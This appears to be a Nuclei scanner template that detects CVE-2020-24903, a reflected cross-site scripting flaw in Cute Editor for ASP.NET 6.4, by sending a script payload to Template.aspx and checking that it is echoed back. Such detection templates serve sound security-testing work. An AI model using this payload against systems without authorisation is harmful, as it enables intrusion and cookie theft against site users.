50 lines
1.4 KiB
YAML
50 lines
1.4 KiB
YAML
id: CVE-2020-24903
|
|
|
|
info:
|
|
name: Cute Editor for ASP.NET 6.4 - Cross-Site Scripting
|
|
author: edoardottt
|
|
severity: medium
|
|
description: |
|
|
Cute Editor for ASP.NET 6.4 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
|
reference:
|
|
- https://seclists.org/bugtraq/2016/Mar/104
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-24903
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2020-24903
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00246
|
|
cpe: cpe:2.3:a:cutesoft:cute_editor:6.4:*:*:*:*:asp.net:*:*
|
|
metadata:
|
|
max-request: 1
|
|
shodan-query: http.component:"ASP.NET"
|
|
verified: true
|
|
framework: asp.net
|
|
vendor: cutesoft
|
|
product: cute_editor
|
|
tags: cve,cve2020,cuteeditor,xss,seclists
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/CuteSoft_Client/CuteEditor/Template.aspx?Referrer=XSS";><script>alert(document.domain)</script>'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "<script>alert(document.domain)</script></p>"
|
|
- "System.Web"
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|